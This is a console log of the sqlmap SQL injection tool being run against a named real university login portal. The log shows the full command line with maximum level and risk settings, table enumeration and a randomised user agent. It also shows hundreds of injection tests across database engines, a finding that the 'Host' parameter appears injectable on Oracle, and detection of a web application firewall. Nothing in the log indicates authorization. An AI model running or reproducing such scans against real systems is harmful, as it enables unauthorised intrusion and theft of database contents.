[16:07:25] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[16:07:38] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[16:07:49] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'
[16:08:03] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:08:13] [INFO] testing 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:08:26] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:08:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[16:08:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[16:08:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[16:08:27] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[16:08:27] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[16:08:27] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[16:08:27] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[16:08:27] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (original value)'
[16:08:28] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)'
[16:08:28] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)'
[16:08:28] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[16:08:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[16:08:29] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[16:08:29] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[16:08:30] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[16:08:30] [INFO] testing 'Informix boolean-based blind - Parameter replace (original value)'
[16:08:30] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[16:08:30] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace (original value)'
[16:08:30] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:08:31] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[16:08:31] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:08:31] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[16:08:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:08:32] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:32] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:08:32] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:33] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (original value)'
[16:08:33] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)'
[16:08:34] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[16:08:34] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)'
[16:08:35] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:35] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:08:36] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:36] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:08:37] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:37] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:08:37] [INFO] testing 'IBM DB2 boolean-based blind - ORDER BY clause'
[16:08:38] [INFO] testing 'IBM DB2 boolean-based blind - ORDER BY clause (original value)'
[16:08:38] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[16:08:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[16:08:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[16:08:56] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[16:09:04] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)'
[16:09:11] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[16:09:17] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries'
[16:09:24] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[16:09:31] [INFO] testing 'Microsoft Access boolean-based blind - Stacked queries'
[16:09:39] [INFO] testing 'SAP MaxDB boolean-based blind - Stacked queries'
[16:09:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:09:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:10:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:10:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:10:20] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:10:27] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:10:35] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:10:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:10:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:10:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:11:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:11:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:11:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:11:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:11:37] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:11:44] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[16:11:51] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:11:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:12:07] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[16:12:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:12:21] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[16:12:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[16:12:35] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[16:12:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[16:12:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[16:12:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:13:02] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[16:13:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:13:15] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:13:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:13:28] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:13:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[16:13:42] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[16:13:47] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[16:13:52] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[16:13:57] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[16:14:02] [INFO] testing 'MonetDB OR error-based - WHERE or HAVING clause'
[16:14:07] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[16:14:13] [INFO] testing 'Vertica OR error-based - WHERE or HAVING clause'
[16:14:17] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[16:14:23] [INFO] testing 'IBM DB2 OR error-based - WHERE or HAVING clause'
[16:14:34] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:14:42] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:14:49] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:14:55] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:14:56] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:14:56] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[16:14:56] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:14:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:14:56] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:14:56] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:14:57] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[16:14:57] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[16:14:57] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[16:14:57] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[16:14:58] [INFO] testing 'Oracle error-based - Parameter replace'
[16:14:58] [INFO] testing 'Firebird error-based - Parameter replace'
[16:14:58] [INFO] testing 'IBM DB2 error-based - Parameter replace'
[16:14:58] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[16:14:59] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[16:15:00] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[16:15:00] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[16:15:01] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[16:15:01] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[16:15:01] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[16:15:02] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[16:15:02] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[16:15:02] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)'
[16:15:02] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[16:15:03] [INFO] testing 'Oracle error-based - ORDER BY, GROUP BY clause'
[16:15:03] [INFO] testing 'Firebird error-based - ORDER BY clause'
[16:15:03] [INFO] testing 'IBM DB2 error-based - ORDER BY clause'
[16:15:04] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[16:15:07] [INFO] testing 'Generic inline queries'
[16:15:08] [INFO] testing 'MySQL inline queries'
[16:15:08] [INFO] testing 'PostgreSQL inline queries'
[16:15:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:15:08] [INFO] testing 'Oracle inline queries'
[16:15:08] [INFO] testing 'SQLite inline queries'
[16:15:08] [INFO] testing 'Firebird inline queries'
[16:15:09] [INFO] testing 'ClickHouse inline queries'
[16:15:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:15:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[16:15:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[16:15:25] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[16:15:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[16:15:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[16:15:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:15:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:15:51] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[16:15:55] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[16:16:03] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[16:16:06] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[16:16:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:16:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[16:16:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:16:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE)'
[16:16:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:16:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[16:16:51] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[16:16:55] [INFO] testing 'Oracle stacked queries (heavy query)'
[16:17:03] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[16:17:11] [INFO] parameter 'Host' appears to be 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
y
[16:21:21] [ERROR] user quit
[*] ending @ 16:21:21 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u "https://portal.mcut.edu.tw/login.do" -p Host --tables --level 5 --risk 3 --random-agent
___
__H__
___ ___[']_____ ___ ___ {1.7.3#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:21:29 /2023-03-23/
[16:21:29] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.6' from file 'C:\Users\ricky\Desktop\sqlmap-dev\data\txt\user-agents.txt'
[16:21:29] [INFO] testing connection to the target URL
[16:21:30] [INFO] testing if the target URL content is stable
[16:21:30] [INFO] target URL content is stable
[16:21:30] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[16:21:30] [INFO] testing for SQL injection on parameter 'Host'
[16:21:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:21:31] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[16:21:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[16:22:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[16:22:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:22:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:22:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:22:37] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[16:22:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[16:22:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:22:49] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:22:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[16:23:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[16:23:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[16:23:15] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:23:26] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[16:23:36] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[16:23:51] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[16:24:01] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[16:24:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[16:24:27] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[16:24:41] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[16:24:52] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'
[16:25:06] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:25:17] [INFO] testing 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:25:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:25:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[16:25:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[16:25:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[16:25:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[16:25:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[16:25:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[16:25:32] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[16:25:32] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (original value)'
[16:25:33] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)'
[16:25:33] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)'
[16:25:33] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[16:25:34] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[16:25:34] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[16:25:34] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[16:25:34] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[16:25:35] [INFO] testing 'Informix boolean-based blind - Parameter replace (original value)'
[16:25:35] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[16:25:35] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace (original value)'
[16:25:36] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:25:36] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[16:25:36] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:25:36] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[16:25:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:25:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:25:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:25:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:25:37] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[16:25:38] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (original value)'
[16:25:39] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)'
[16:25:40] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[16:25:41] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)'
[16:25:42] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[16:25:42] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:25:43] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause'
[16:25:44] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:25:44] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause'
[16:25:44] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:25:45] [INFO] testing 'IBM DB2 boolean-based blind - ORDER BY clause'
[16:25:45] [INFO] testing 'IBM DB2 boolean-based blind - ORDER BY clause (original value)'
[16:25:46] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[16:25:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[16:26:02] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[16:26:02] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[16:26:09] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)'
[16:26:16] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[16:26:23] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries'
[16:26:30] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[16:26:37] [INFO] testing 'Microsoft Access boolean-based blind - Stacked queries'
[16:26:44] [INFO] testing 'SAP MaxDB boolean-based blind - Stacked queries'
[16:26:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:26:59] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:27:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:27:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:27:21] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:27:29] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:27:37] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:27:45] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:27:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:27:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:28:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:28:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:28:20] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:28:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:28:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:28:41] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[16:28:56] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:29:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:29:14] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[16:29:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:29:33] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[16:29:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[16:29:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[16:29:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[16:30:05] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[16:30:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:30:20] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[16:30:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:30:35] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:30:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:30:50] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:30:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[16:31:08] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[16:31:15] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[16:31:20] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[16:31:26] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[16:31:33] [INFO] testing 'MonetDB OR error-based - WHERE or HAVING clause'
[16:31:39] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[16:31:46] [INFO] testing 'Vertica OR error-based - WHERE or HAVING clause'
[16:31:52] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[16:31:58] [INFO] testing 'IBM DB2 OR error-based - WHERE or HAVING clause'
[16:32:05] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:32:13] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:32:23] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:32:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:32:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:32:30] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[16:32:30] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:32:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:32:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:32:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:32:31] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[16:32:31] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[16:32:31] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[16:32:31] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[16:32:31] [INFO] testing 'Oracle error-based - Parameter replace'
[16:32:31] [INFO] testing 'Firebird error-based - Parameter replace'
[16:32:32] [INFO] testing 'IBM DB2 error-based - Parameter replace'
[16:32:32] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[16:32:32] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
